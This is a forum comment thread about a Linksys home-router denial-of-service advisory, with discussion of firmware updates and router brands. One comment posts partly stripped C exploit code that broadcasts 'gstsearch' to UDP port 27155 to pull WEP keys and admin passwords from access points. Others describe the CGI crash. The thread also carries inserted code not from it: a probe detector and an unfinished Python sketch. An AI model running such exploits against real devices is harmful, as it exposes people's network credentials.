Vulnerability In Linksys Cable/DSL Router
ispcay writes "Yahoo has published an article on a Linksys vulnerability. An easily exploitable software vulnerability in a common home networking router by Linksys Group could expose thousands of home users to denial of service attacks, according to a security advisory issued by iDefense, a software security company." The article's kinda sparse on details, but does mention that the vulnerability is fixed in the latest firmware release. Upgrade 'em if ya got 'em!
I use netgear :)
Not to say that something like this won't happen to netgear. Plus you have to be concerned about those companies putting backdoors in for the NSA.
after everyone who knows what they are doing flashes their firmware, 99.9% of routers will remain vulnerable...
I hold a patent on sigs...
check Popular Linksys Router Vulnerable to Attack
on eWeek also
According to the article, if you have remote management turned off, then people out on the internet can't use the exploit against you.
If this thing behaves anything like the way my WAP-11 wireless access point behaves, I feel really sorry for the people using this as their firewall.
There were days I couldn't even reach downstairs with the damned thing.
- A.P.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Don't most of the router/firewalls Linksys sells run GNU/Linux as their embedded OS? I seem to remember reading an article in linuxjournal that said as much.
I am sure not a single hacker out there is going to investigate if Hillary Rosen has upgraded her software, and if they did so, it would only be to test her system, due to concern for her security and to warn her of possible problems.
---
When you come to a fork in the road, take it! --Yogi Berra--
It's a 4 port home router - who's going to wage a DOS attack on a piddly $50 home router? And even if they did - just reset the darn thing. No big deal. I would only get the patch if this problem happened repeatedly.
Or am I missing something?
From the e-week article, all you have to do is disable remote admin, which is the default setting, which you should have confirmed anyhow. Duh.
No firmware flashing needed.
political_news.c: warning: comparison is always true due to limited range of data type
While I agree that the vast majority of home users will either lack the technical expertise or poise to flash the firmware, these are the people who will plug in the router and forget it, which means remote management won't be turned on so the attack won't be possible (unless the user opens up a telnet or SSH port for NAT pass-thru).
--CTH
--Got Lists? | Top 95 Star Wars Line
http://www.linksys.com/download/default.asp
While I have a linksys router, this still does not concern me. All I have to do, is unplug it, and plug it back in. Net' access restored. I don't know of any home users who need 100% uptime internet access. I suppose there are some work at home people who might need it. But personally, I have more problems with AT&T cable's fluctuating speeds than I would with my router crashing.
This only affects you if your router has 'remote management' enabled. Since so few people need this, and those that do are more technically minded, this shouldn't be much of an issue. The worst this flaw can cause anyways is for the router to crash. The software in there sucks. My linksys crashes if it can't find a dhcp server; that a simple cgi script error crashes it is nothing new to me.
Photos.
It looks like in order to cause the crash you have to have remote management enabled. Why on earth you would allow your router to be configured from outside on the internet boggles my mind. I would assume that this feature would be disabled by default, but then again who knows. I've owned a few cheap routers before and in order to use remote management you had to be connecting from an internal ip address, along with not coming through the wan port.
Just my 2 cents.
Devices like linksys suffered from a much larger security problem. IGNORANCE! Highspeed access in the home has brought about a whole new type of internet user. The type that doesn't log off. Let's be honest, many of us are lazy. We know what we are doing but still lazy. Then there is the other group, not lazy, but they don't know what they are doing. The security issues that go along with multiple machines, always connected to the internet without ANY protection (Node firewalls like norton internet security for example or virus protection, I don't need to give an example of that) far exceed any "NEW" issues that may now exist because of a flaw in this product. Education!!! Plain and simple will reduce any threat that this flaw or any other would exacerbate.
Here is the location of the Linksys BEFSR41 firmware upgrade utility v1.43 released Sept 4, 2002. It's the newest one I could find.
I have one of these, and the remote administration isn't enabled by default.
So for Aunt Tilly, there's no real danger unless the malicious person is on the network.
Anyone remember the Bud Ice commercials? "...I REPEAT! THAT CALL WAS PLACED FROM INSIDE THE HOUSE!!"
I upgraded my BEFSR11 and it used the same firmware update as the *41 (4 port switch model) so it's pretty safe to assume this version is vulnerable as well.
The firmware updates can be had here:
http://www.linksys.com/download/firmware.asp
I was looking for a link to their page since I am lazy. No one posted one yet, so here is one for all the other lazy people like me:
http://www.linksys.com/download/
--- Sig test. 1...2...3...
Unless you've got your router setup to allow you to configure it remotely (ie: on the cablemodem side of the network; aka, while you're at your friends house). If you've done this, odds are this problem is the least of your concerns.
And there's already a firmware fix for it, should you be concerned that any script kiddies living in your house will want to hose their connection to the outside world...
How many people that own these routers will actually update the firmware? Or how many even will know that their router has a problem. I know several people with Linksys routers and I know if somebody doesn't tell them to update something, they won't update it on their own. Even if the people who know how to update their routers and know that there is a problem update them, that still leaves the majority of users in the dark. Not a good idea.....
Firstly, my router (SMC, not linksys) crashes on its own every now and then.
It's consumer grade gear, people are probably used to turning them off and back on again anyway. And it's not like the main computer is affected.
Secondly, the attack has to originate on the inside network. It's not like the script kiddiz can take out these boxes en masse by blasting out a load of packets. Once you visit a malicious site - if there even is a real one - you'll soon learn not to go there again.
When will the media realize that not all DoS attacks are DDoS? DDoS is when the attacker gets a bunch of machines to all send data to the target machine, causing the target to run out of resources to handle all connections, swallowing the legit traffic in the process.
"Normal" DoS is what this is - crashing the target. For example, an old flaw in Wu-FTPD allowed a core dump - crashing the daemon and creating a DoS to anyone who needs it. All it took was a malformed request during a session. One machine required, not many.
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
Weird or what...
I've spent this evening trying to sort out why the router goes belly-up after using eDonkey for a while. The problem started a week ago, but since then the occurrences were more regular. I just upgraded the firmware an hour ago!!!
I have the BEFSR411 and found a decent forum link with the same problem... and there is another link of info/problems here.
I suppose it goes without saying that updating the firmware is a good idea... at least there are more improvements to the web-config interface. I'll just have to see how long the connection stays up.
Are you local? There's nothing for you here!
1) most users have not changed the default admin password from 'admin'
2) this is only a problem on the inside network.
I hate Linksys. I have that router, and it kept crashing on me. Changed the cable, everything, etc. Nothing. Even thought it was the cable modem for a while (would lose net access, but I finally found out the router wouldn't accept internal pings either). They sent me a new one (made ME pay for shipping), and it did the same thing. Tried all firmware versions, nothing.
Well, guess what. When you fire a bunch of UDP packets at it, the NAT routing table overflows and the router crashes (it happens faster if you have your DMZ host address set to a nonexistent address on the network), only to reboot itself in a few minutes. This has been tested and proven, but Linksys' response to me is "it's your software firewall, sir, you shouldn't run both at the same time." What a bunch of ignorant assholes. I informed them of the routing table overflow bug, but they ignored me.
Now, this bug shouldn't really affect anybody cause you really shouldn't run remote admin on your router, but with their shoddy firmware, it doesn't surprise me in the bit!
If anyone hears reports of the '41 being subject to ME or XP attacks, please post. For now...well... I've never been afraid of a couple of backslashes or a c:\.
- If we aren't supposed to eat animals, then why are they made out of meat? - Steven Wright
remote management is disabled by default, and the option to enable it, is under the "advanced" tab.
And one reason to have it turned on, is if it's your responsibility to manage the router, and it's easier to connect to it remotely, than talk someone on the LAN through adjusting it over the phone....
now that I think about it, probably the major thing you'd change on the router, is the information you need to connect to your ISP, and with the wrong/outdated info, the router won't be on the internet in the first place.
------ Work is so much easier when you don't
The following showed up on the NetStumbler site yesterday:
- GlobalSunTech develops Wireless Access Points for OEM customers like Linksys, D-Link and others. Capturing the traffic of a WISECOM GL2422AP-0T during the setup phase showed a security problem.
- Sending a broadcast packet to UDP port 27155 containing the string "gstsearch" causes the accesspoint to return wep keys, mac filter and admin password. This happens on the WLAN Side and on the LAN Side.
- Systems Affected:
- Vulnerable, tested, OEM Version from GlobalSunTech:
  - WISECOM GL2422AP-0T
- Possibly vulnerable, not tested, OEM Version from GlobalSunTech:
  - D-Link DWL-900AP+ B1 version 2.1 and 2.2
  - ALLOY GL-2422AP-S
  - EUSSO GL2422-AP
  - LINKSYS WAP11 v2.2
(And I just got a WAP11, dammit.)
In other news, JWZ's DNA Lounge is having troubles with their Linksys WAP11-based wireless link, which is their only connectivity right now.
- "...the best sustained throughput they can handle is on the order of 64k."
Ouch. (They lost their T1 due to XO's bankruptcy and above.net closing a facility. Another T1 is on the way, but it'll be a couple weeks...)
"...America's great minds of today, teaching America's great minds of tomorrow. Poor bastards." -- A Beautiful Min
'cause I was thinking of buying one.
Also - which wireless PCMCIA (or whatever the acronym is) is a good one?
Is encryption turned on by default on these things?
This boggles my mind:
The 4-port DSL router (vulnerable) is using firmware 1.40something, and must be upgraded. The latest is 1.43.
The 8-port model, which is what I have, and which is exactly the same damn thing (same functionality, same interface, almost the same user manual) except that it's a few inches wider and has 4 more ports, uses firmware 2.something. And is apparently not vulnerable.
Providing another 4 ports (one extra bit?) requires the firmware to be that different?
You cannot apply a technological solution to a sociological problem. (Edwards' Law)
When I ran the following code, which is designed to return the wep key, admin username and password on my linksys befsr41w. It hard locked. I tried it again. Same thing.
(the befsr41w is less common, it's like a befsr41 with a pcmcia slot so you can upgrade it to support wireless networking)
here's the code
#include
#include
#include
#include
#include
typedef struct {
char type[28];
char name[32];
char user[16];
char pass[16];
}
__attribute__ ((packed)) answer;
int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);
sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd type);
printf("Announced Name : %s\n",ans->name);
printf("Admin Username : %s\n",ans->user);
printf("Admin Password : %s\n",ans->pass);
return 0;
}
Nuff Said. I'm disappointed in Linksys.
Remember that you are unique, just like everybody else.
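For anyone watching their own LAN for the "gstsearch" probe described in this thread, here is an added example (not code from the thread or from any vendor) that classifies UDP datagrams: it flags the probe to port 27155 and then flags a reply to the prober whose user or password field is populated, using the reply layout posted above. The datagram struct, the tracker and the sample packets are constructed for illustration, and it assumes the access point answers by unicast to the prober's source port.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GST_PORT  27155u
#define GST_PROBE "gstsearch"
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | \
                         ((uint32_t)(c) << 8) | (uint32_t)(d))

/* Reply layout as posted in the thread: 28 + 32 + 16 + 16 = 92 bytes. */
typedef struct {
    char type[28];
    char name[32];
    char user[16];
    char pass[16];
} __attribute__((packed)) gst_answer;

enum gst_verdict { GST_CLEAN = 0, GST_PROBE_SEEN = 1, GST_REPLY_LEAK = 2 };

/* Hypothetical summary of one captured UDP datagram (not a real pcap type). */
struct udp_dgram {
    uint32_t src_ip, dst_ip;
    uint16_t src_port, dst_port;
    const unsigned char *payload;
    size_t len;
};

/* Remembers who sent the last probe so the matching reply can be spotted. */
struct gst_tracker { int armed; uint32_t ip; uint16_t port; };

/* 1 if the fixed-width field holds a non-empty, NUL-terminated ASCII string. */
static int field_has_text(const char *f, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)f[i];
        if (c == '\0') return i > 0;
        if (c < 0x20 || c > 0x7e) return 0;
    }
    return 0; /* no terminator inside the field */
}

enum gst_verdict gst_inspect(struct gst_tracker *t, const struct udp_dgram *d)
{
    size_t plen = strlen(GST_PROBE);

    /* The probe: "gstsearch" sent to UDP port 27155. */
    if (d->dst_port == GST_PORT && d->len >= plen &&
        memcmp(d->payload, GST_PROBE, plen) == 0) {
        t->armed = 1;
        t->ip = d->src_ip;
        t->port = d->src_port;
        return GST_PROBE_SEEN;
    }
    /* A reply to the prober that is large enough to be the answer struct
     * and carries a credential field. The fields are never printed. */
    if (t->armed && d->dst_ip == t->ip && d->dst_port == t->port &&
        d->len >= sizeof(gst_answer)) {
        gst_answer a;
        memcpy(&a, d->payload, sizeof a);
        if (field_has_text(a.user, sizeof a.user) ||
            field_has_text(a.pass, sizeof a.pass))
            return GST_REPLY_LEAK;
    }
    return GST_CLEAN;
}

/* Runs the detector over four constructed datagrams; returns how many
 * were inspected and writes the probe and leak counts. */
int gst_demo(int *probes, int *leaks)
{
    static const unsigned char probe[] = GST_PROBE;
    static const unsigned char dns[] = { 0x12, 0x34, 0x01, 0x00 };
    static const unsigned char tiny[10] = { 0 };
    struct gst_tracker t = { 0, 0, 0 };
    struct udp_dgram s[4];
    gst_answer reply;
    int i;

    memset(&reply, 0, sizeof reply);       /* constructed sample values */
    strcpy(reply.type, "constructed-ap");
    strcpy(reply.name, "lab-ap");
    strcpy(reply.user, "admin");
    strcpy(reply.pass, "example-pass");

    s[0] = (struct udp_dgram){ IP4(192,168,1,50), IP4(255,255,255,255),
                               40000, GST_PORT, probe, sizeof probe - 1 };
    s[1] = (struct udp_dgram){ IP4(192,168,1,50), IP4(192,168,1,1),
                               40001, 53, dns, sizeof dns };
    s[2] = (struct udp_dgram){ IP4(192,168,1,9), IP4(192,168,1,50),
                               5000, 40000, tiny, sizeof tiny };
    s[3] = (struct udp_dgram){ IP4(192,168,1,250), IP4(192,168,1,50),
                               GST_PORT, 40000,
                               (const unsigned char *)&reply, sizeof reply };

    *probes = *leaks = 0;
    for (i = 0; i < 4; i++) {
        enum gst_verdict v = gst_inspect(&t, &s[i]);
        if (v == GST_PROBE_SEEN) (*probes)++;
        if (v == GST_REPLY_LEAK) (*leaks)++;
    }
    return 4;
}

int main(void)
{
    int probes, leaks;
    int n = gst_demo(&probes, &leaks);
    printf("%d datagrams: %d probe(s), %d credential reply(ies)\n",
           n, probes, leaks);
    return 0;
}
```

A hit on either verdict means a device on that segment still answers the query, which is the cue to check its firmware version.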
This is old news all. Basically you could use SNMP to turn on the remote management (e.g. use web interface from the WAN side). Then once you had web access you could do anything the web interface would allow. They fixed this how long ago? PS There is a new release of the firmware postdating the article (1.43). Some moderator was in a hurry and posted FUD.
It wouldn't take much to flood a DSL line with enough traffic to render it useless, no matter what router is on the home user's end. Only the ISP's routers could block a DoS attack like that.
What a lame report! The sparse on details is that the remote management feature is not enabled by default. Well, doh!, if I turn on remote management someone can get in and affect my system (particularly if I don't change the password). Imagine that!
I'm an American. I love this country and the freedoms that we used to have.
http://www.linksys.com/download/
This comes under the "Duh..." category. Why would anyone allow Remote Management Access on their router (or computer, for that matter) without a specific need for such a functionality and additional safeguards in place? Oh, I suppose that possibly the firmware had RMA "on" by default ....
Here is a mailing list archive or yet another redundant reference of this problem. It's almost a year old. Come on slashdotters, don't get sloppy in the deluge huh?
I just went around the fucking merry go round with linksys's wpc11 pcmcia card. What a flaming POS! The card was flimsy, the drivers flat out didn't work, and when I called the techsupport line the lady on the other end of the line in buttfuck India was clueless... AVOID ANYTHING LINKSYS!!! I switched to a netgear (ma401 iirc) wireless card and it Just Worked. No fuss, no muss.
What you're all forgetting is, this is only an issue if you have remote management enabled, and it's not enabled by default...
(Seriously, does anyone read a thread before they post anymore?)
I'm glad they posted this. Eventually I'll go over to my mom's house and upgrade her firmware. I can't really see her crashing her own router... well, not on purpose, anyway. She might by accident trying to go to Yahoo! (which is what she calls whatever browser she happens to be using, unless it's AOL. No, not net savvy.)
Don't you wish your girlfriend was a geek like me?
Thank god I got a SMC router instead of a Linksys!
Does that mean that my win2k, winXP and win98 machines are safe now?
-- Andy
LinkSys only offers a specialized Windows firmware upgrading tool. The router itself has a Java applet that is supposed to work, but didn't for me in Mozilla 1.2b or IE 5.2.2. A friend directed me here. It has instructions on how to upgrade the firmware in Mac OS 9/X using their specialized tool. It worked for me.
In one firmware update last year, the "WAN UPDATE" setting was defaulted to yes. This would enable anyone to connect to a linksys router and update the configuration to their hearts content, or write a script to scan through an IP range and automate it.
http://arstechnica.infopop.net/OpenTopic/page?a=tpc&s=50009562&f=469092836&m=5300962863
I reported this to linksys, they quickly gave me another firmware update, but other users reported the same thing.
Linksys firmware since February 2002 has been reasonably decent. Early versions would crash about once a day in normal operation.
Avoid FORD, get a Chevy. I had a Ford break down once...
Avoid Chevy, get a Ford, I had a Ford break down once....
Maybe it is the driver? Maybe if you buy the WORSE model Ford or Chevy makes you have problems? Brands don't mean crap. You have to get _specific_ on which model, which version of the Linksys, etc.
Opinions?
Many other products both software firewalls (i.e. for Windows) and hardware routers (i.e. my D-Link) include an option for remote admin.
If users were to enable remote admin on these products, would they not be just as vulnerable too?
It seems to me that home products may not require the remote admin feature. I never use mine, and I'm still alive!
It's not all that urgent for me, since however idiotic I might be, I made doubly sure when I set the thing up that remote management was disabled. Imagine all the "http://admin:admin@address/" attempts there'd be otherwise.
Prime numbers are exactly what Alan Greenspan says they are -S. Minsky
Yes, there's a DoS possibility in the Linksys routers. It's fixed in the 1.43 firmware release. Anyone who reads the Linksys forum at DSL Reports has known about this for weeks!
Slightly on-topic can anyone tell me what vulnerabilities exist if you are running a DSL router using NAT but no firewall ?
I have a small to fair amount of TCP/IP knowledge and at the moment my thinking is that you are only really vulnerable to DOS attacks.
I mean, if you aren't forwarding any ports then the only time there is a chink in your armour is when you have a temporary alias set up for a connection, which will be one port on one of the machines on your LAN. This alias won't last for long, and it will be on a port you're using for getting out, e.g. port 80,125... and you'd probably have to set your firewall up to allow this through if you ran a firewall.
Normally if a packet comes in to your sole external ip address and you haven't set up any port forwarding (or you have but it's not one of the ports you want to forward), the DSL router will just drop the packet.
Can anyone please clue me in on the vulnerabilities of using NAT alone and no firewall ?
graspee
I saw this happening on my router about three weeks ago... lights freaking out blinking... in other words a lot of traffic going through... Hit the good ole netstat -n and the spoofed IP adds were from get this... IANA.org What a sense of humor! Went through a bout of paranoia updated all my hardware firmware and other crap... Called Comcast told them about the DoS attack... of course they didn't care...
Still a great piece of hardware.
I think this is the first or one of the first times we hear of one of these small router/NAT devices having vulnerabilities. This one is not very serious as it will only crash the device rather than allow someone to gain access to the network, but both this and other devices may have holes that would allow hackers to gain access to home LANs.
This could be a serious problem in the coming future with these small routers/NATers being combined with wireless APs for everyone to use AIM from the couch. Great and all but people with these things are probably going to bother even less with security than they do now, thereby introducing a whole host of nasty little attacks.
This should be interesting to watch for.
The default Linksys in the article has 4 ports, true, but they can actually support 254 clients if you connect them to a switch. Furthermore, the BEFSR11 is a one-port, designed to be connected to a switch or hub, and has proven very popular in labs of anywhere from 10-30 workstations, although it can actually support up to 254 clients. Consequently, there are those out there who may get a sick kick out of kicking schools, non-profit organizations and other institutions offline.
The BEFSR11 is truly cool. $50 gets you a box that barely draws any power and routes requests quite nicely for 254 machines and functions as a DHCP server to boot. Practically maintenance free. Most of mine already have upgraded firmware, but you can bet that I - and several other admins who oversee non-profit and educational sites - will be busy checking firmware versions for a while.
To cause a crash, an attacker only needs to enter the URL (uniform resource locator) for a CGI (Common Gateway Interface) script used to configure and manage the router without providing any "arguments" (input for the script to process), according to iDefense.
>Brands don't mean crap.
Because, hey, the only Lada that sucks is all of them.
If you could be told what you can see or read, then it follows that you could be told what to say or think - BoC
I have 2 WAP 11's bridging a T1 line over 1600 feet. They've worked perfectly for over 6 months and have never been rebooted or reset. Paid for themselves a couple times over. Consistent 1.4Mbps all the time. Sorry about your problems.
"Eve of Destruction", it's not just for old hippies anymore...
I had an early post in this thread pointing out the popularity of this router in non-profit and educational settings to run labs - since this router is vulnerable to this attack from the inside or outside, (outside only if remote management is enabled), it should still be patched - because even if remote mgt is disabled some idiot delinquent on the inside can bring down the whole facility just by cutting & pasting into the URL of their browser if they are behind the router. I support several labs that have people silly enough to do just that for kicks.
Wouldn't it be nice if the remote management actually allowed you to remotely manage the router/modem, to be able to flash the firmware - the name does seem to suggest that. That way, everyone who was vulnerable, would be all those who could be immediately fixed.
I.O.U One Sig.
Referenced file
The way the term DOS is used in this article is misleading. By executing this attack, the attacker causes the user of the router to be denied service. But unlike DOS as in the usual sense, there is no way for that connection to then be harnessed in a traditional denial of service attack on remote servers such as yahoo, ebay, etc. This should hardly be considered a DOS attack, since the effect is so localized, whereas a DOS attack generally is large-scale in its effects.
And why in God's own bumfucking earth would you run a crappy router like this in a LAB? Seriously, you can get a decent 8-port switch for under fifty bux, grab a 486 at goodwill (frequently for free, as nobody wants a 486 anymore except cash-starved K-12 net admins looking for cheap routers), toss in a couple of old nics, write five lines of iptables, and guess what? You have a hell of a lot more secure NAT solution for your lab than a crufty plastic home gateway router. Assuming you don't let the kids see your root password. Don't get me wrong, I like my BEFSR41, but no way in hell would I ever use it outside of my house.
political_news.c: warning: comparison is always true due to limited range of data type
Sending a certain string over a certain UDP port will cause the AP to return the WEP key, mac filter settings, and admin password over the WLAN and LAN side.
Exploit can be found here
Makes me glad to have bought an Apple Airport for a change.
I tried every decent and legal way I could think of to resolve the issue w/the business before I rented the chicken suit
If you've seen slapper in action, you know this is true. A host behind the router gets infected by the slapper.* worm, and first thing it does (after building itself a new home) is start probing subnets for others. It finds friends, they talk, and much traffic ensues.
The Linksys can stand maybe 6, maybe 10 hours of that much UDP traffic before it reboots. Since the traffic is still coming in when it comes back up, it runs about a 10% chance (guestimate) of restarting successfully. It hangs otherwise. Power cycling restores functionality, and resets the inevitable cycle.
I don't think it's a fault of Linksys. They have a product aimed at a certain market; judging from its popularity it does quite well there. If you have special needs beyond the average SOHO user, you need either an SDK or another vendor.
-B
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
The third reason is that Block WAN Request is enabled by default. This is how these routers make themselves invisible to the web: they just drop the packets that come from outside. This can be combined with opening a specific port (forwarding), in which case the traffic on that port is directed to a SPECIFIC machine on the LAN.
The Lazy Way to deal with this is to turn remote management off. If you have no problems, leave it alone until you have some other reason to flash it.
BTW, the last firmware upgrade on the "41" works great with WinXP UPnP. Fairly easy to set up safely (update Windows), and it lets me put my dad behind NAT and still fix his system remotely using XP Remote Assistance. It actually works, much to my amazement, and AFAIK, there are no serious vulnerabilities if it's done right.
1.43 seems to still have a bug where the uPnP forwarding page doesn't load properly. Linksys' "fix" for BEFSR41 v1 owners is to load the FORMER version of firmware which doesn't have uPnP which is apparently susceptible to this vulnerability. (Note: I have remote management turned off, please don't waste time trying to hax0r me.)
As a result I am never buying another linksys firewall product nor am I suggesting them for others. I'm hoping that someone will bring out a mini itx with dual ethernet soon so I can cheaply build a very small linux-based replacement for my linksys box. (IE, which runs off a small power supply.) I have a 2 gig laptop disk just sitting waiting...
"You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
If I can't see under the hood (who says I'll understand everything I'll see though), I tend not to trust things like this, esp. when it comes to security. My good ol' linux router on a P90 suits me just fine and I can do so much more with it. I don't see me owning one of these ever, so I don't have to worry. :)
"There is no patch available for the problem at this point, but firmaware version 1.43 fixes the problem."
And what the hell is eWeek doing writing about 'firmaware'?
heh
Just to play devil's advocate... it works for me.
I used to run a linux NAT box to act as the first line of defense on my home network, and it worked for months and months without EVER needing to be tweaked or cuddled.
When that box got cannibalized for a greater good, I needed something else... enter the Linksys router box... plug it in, enter your settings, and off you go. No fuss, no mess.
Hey, I like to tinker with my computers as much or more than the next guy, but there's only so many hours in the day, and my spouse was getting tired of my endless tinkering with the network. Of course, we also had a baby around the same time; some things are more important than running the ultimate 1337 Linux firewall/router.
Whoops... I just stated that something is more important than computer tinkering...
What the hell... it's only karma
Even if a man chops off your hand with a sword, you still have two nice, sharp bones to stick in his eyes.
Sparing all that has been said on this, I have 2 points:
1) RTFM. I turned off remote admin on my router within 10 minutes of hooking it up. Yeah, I also changed the admin password. Duh. If people are too dumb to do that, it's their problem.
2) This "new" firmware has BEEN OUT FOR ALMOST TWO MONTHS.
Checking for new firmware is almost standard practice for Linksys owners -who have some clue. Thus, I've been running on this supposed "new" firmware for a while now, long before the media jumped all over it (and like a virus, I see it hopping from one media outlet to another to another and it seems NONE of them are independently checking the facts of the story.)
Summary: This issue is about a problem that should not exist which in any case is solved by a "new" firmware upgrade that's not actually "new."
Thank you media.
I own this product, so have decided to upgrade the firmware. Since I'm running Debian, I clicked the "Other Operating Systems" link on the firmware download page, only to be presented with a ZIP archive containing a Windows executable! Is this some kind of sick joke?
If you own this router and you own IE 5 or above, please visit this upgrade page, substituting the IP of your modem for 192.168.1.1 [Default].
While these "DSL routers" and other various "consumer grade" networking products have popped up like dandelions in spring, so have the problems.
;-)
My first venture into the fray was with an XSense (formerly MacSense) Xrouter. It was their variation on the "cable router" scene, for what is really more properly named a NAT box. It seemed to handle the fileserver well and port mapping was working fine. For their credit I'd also like to say they have some of the most impressive event logging I have ever seen, even recognizing attacks and identifying them by name. Then I tried to run a traceroute to an outside point to see how hop times were looking. Nothing.
"Maybe it's filtering my packets?" I think, and try to connect to its web administration page, but no response. Oops, my clients just lost connection to the servers they were attached to. And look, all the users are dropping off my server. What the...? It turns out that any attempt to traceroute out causes the router to reboot. It continues to reboot until you stop the traceroute, and then takes several seconds to unscramble its eggs before you get connectivity back.
I called up XSense and asked them what was going on, and if they had a firmware flash for me to fix it. Surprise, he reminds me that they did indeed ship their own traceroute program with the router, and I should use that. I run it, and surely enough, no crash. Tried every other traceroute app I could find, and every single one crashed the router except theirs.
The words known issue float through my head. I bickered a bit with the rep about how NO app I (or any of my users!!!) runs should be able to crash my NAT. End result, they don't care. Got off the phone with them and called up the vendor, they're like "here, let me get you the manufacturer's support number". "Nope, they told me tough luck they know about it and they don't care." "Oh... let me get you an RMA."
I actually ended up exchanging it for an Asante FR4003, which has worked flawlessly ever since. It gets a bit warm, so I keep it elevated so the metal bottom plate gets some convection. (it really should have some ventilation slots) And they've updated their firmware twice now, once both times including suggestions for improvements that I sent them. Very solid product. Interesting people answering their tech support though, I got a bit agitated one time when I was doing something stupid and got a bit argumentative with them... that's the only time I've ever had a customer support rep tell me to "shut the hell up and listen for a minute!" but maybe that's what I needed to hear at the time...
I work for the Department of Redundancy Department.
I mean christ, their webpage is falling apart, sure Addtron routers may not be as flashy as Netgear or Linksys brandwise, but damn, it can't be *that* hard or *that* costly to maintain a site well enough to get the firmware updates that people need.
At least there are brands that try to take care of their customers' concerns. Yeah I know a homebrew linux router would do the trick, but I paid good money for this router and they give me an unusable site for support in return.
A Penny for my thoughts? Here's my two cents. I got ripped off!
I love it how slashdotters bitch and complain about anything vaguely microsoft.
.doc readers.
(sarchasm)
Linux
OpenOffice.org, StarOffice, anyone?
Actually you CAN upgrade one from Linux. Remove the password and then use tftp. Their mutant Windows tftp has been modified to send the password, which isn't part of the TFTP protocol. But if the password is null the normal tftp works just fine. I have upgraded mine (I have the BEFW1S4 with the wireless included) twice in the approx two years I have owned it and I don't do Windows.
Democrat delenda est
I used PPPoE with a Linksys & BellSouth DSL for better than a year without any problems. What's your bitch with it? And DSL != PPPoE. I'm now on DirectvDSL and they are a super clean pipe. While I have to use their router to get my static IP, while waiting for it to arrive I had an Alcatel Speedtouch Pro in dumb bridge mode doing plain vanilla DHCP on the Linksys. Just depends who you get service from.
Democrat delenda est
Cisco 806 Router Nat+firewall "Exec timeout 0" in exec mode The most insecure thing in my network is the modem, and the boxes running win2k. And people do try to break in, I have logs. Using various exploits including buffer overflow, and fail miserably each and every time. But as for my buddies running linksys routers...they are about to get a real treat > : )
Candy-Coated Knowledge
C'mon guys, if someone is smart enough to purchase a router and know how to use it, they'll flash the firmware.
Could you please post your five lines of iptables?
Thank you.
== WolfriderV6 == I'm willing to admit that *I just might* be wrong... Are you??
That exploit returns an assuring null, at least on firmware 1.42.7, Apr 23 2002. BTW, the code on the netstumbler site has large chunks of it eaten by html-izing it. The original can be found in this PDF file. here
OK, I know I'll be shunned for this...but...
Over the years I've had several Linksys and Netgear routers fail. I got tired of that and decided to try something new. Since I wanted good UPNP support I grabbed one of the new Microsoft routers. I'm not sure who actually makes them, but I figured they had good keyboards and mice, right?
The router is VERY nice. The interface is the best of the bunch, by far. While the Linksys never showed up as a UPNP device on my network (even with upgraded firmware and UPNP enabled) the MS router did. It also has a very simple setup procedure for a new user so they could get a whole network going in a few minutes with no confusion. I've also read that their wireless NAT routers will NOT let you run without WEP enabled and it makes it real easy to enable it. It writes the key to a floppy that can be put in the client workstations to get WEP going.
Tsk tsk tsk.
How sad is that?
-- Karma whore? You betcha. --
...firmware fixes the problem"
???
How ELSE could the router be patched?
Anyone else notice that there were some pretty substantial price drops, including from mail in rebates, in this router about two months before this announcement? I did, because I bought it during that wonderful drop.
"Linksys, based in Irvine, California, could not immediately be reached for comment."
Hi,
;-)
My BEFSR11 router was zapped from the unknown about five weeks ago. It simply stopped passing traffic.
I checked everything else then tried the router. It would not accept my password. I verified it, then tried again, but this time I noticed that it identified itself as a "LinkSic" router, instead of a LinkSys.
I powered down and restarted and it came back as itself. When I emailed LinkSys about it, they seemed to know about it but said they hadn't seen it before. (??)
Things are sucky when you need a NAT'ed router to protect your NAT'ed router
Linksys suffered from an identical problem last year as well...I think they keep futzing up their firmware or something.
Quoth the article...
An attacker could just scan a (network) subnet for IP addresses belonging to Linksys routers.
The IP addresses for most users are assigned by their providers, not Linksys. The only thing I can think of that would give the router away would be the MAC address, but that is only available on the local segment, not to the internet at large, correct?
If this is the case, then "hackers" would have to scan every IP in a subnet because there is no way to determine if a particular IP number is connected to a Linksys router.
Couple this with the fact that the remote access feature is disabled and the threat is reduced.
About the only credible threat would be receiving an HTML email with the default local IP number in it. This would probably get most users since the average person is going to design their home network around their router defaults. When they view the email, the request goes to the router and takes it out of service.
Better upgrade that firmware.
Remember, You are unique...just like everyone else.
Ooh. I've always wanted an opportunity to do this, particularly when it's so well deserved.
RTFM
political_news.c: warning: comparison is always true due to limited range of data type
In a related, underpublicized story, Linksys's WET11, which has been getting a lot of buzz as a cheap wireless ethernet bridge, has a firmware flaw which allows a DoS. LinkSys has been slow to come out with a fix.
What.....like this:
--an unbreakable toy is useful for breaking other toys--
It's impossible to overflow the NAT table with UDP packets on a few sessions. The NAT table keeps one entry per session, not one entry per packet. If I make a connection to a server and get a stream of a trillion UDP packets, that's one entry in the NAT table used to map the session. You would need to sustain 520 sessions to fill up the NAT table.
They say that the router has a 512KB memory buffer, but I'd assume they meant to say that it has 512KB of memory. Most of that memory is probably filled by the OS and settings. I wonder how much memory is actually devoted to the NAT table.
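The per-session behaviour described in the comment above, as an added sketch that is not part of the original thread and not Linksys code. The table capacity, idle timeout, addresses and port numbers are constructed assumptions chosen only to make the model small.

```python
# Toy NAT translation table: one entry per flow (5-tuple), not per packet.
# Capacity and idle timeout are constructed values, not router specifications.
class NatTable:
    def __init__(self, capacity=8, idle_timeout=30):
        self.capacity = capacity
        self.idle_timeout = idle_timeout
        self.entries = {}        # flow 5-tuple -> [external_port, last_seen]
        self.next_port = 40000
        self.dropped = 0         # new flows refused because the table was full

    def _expire(self, now):
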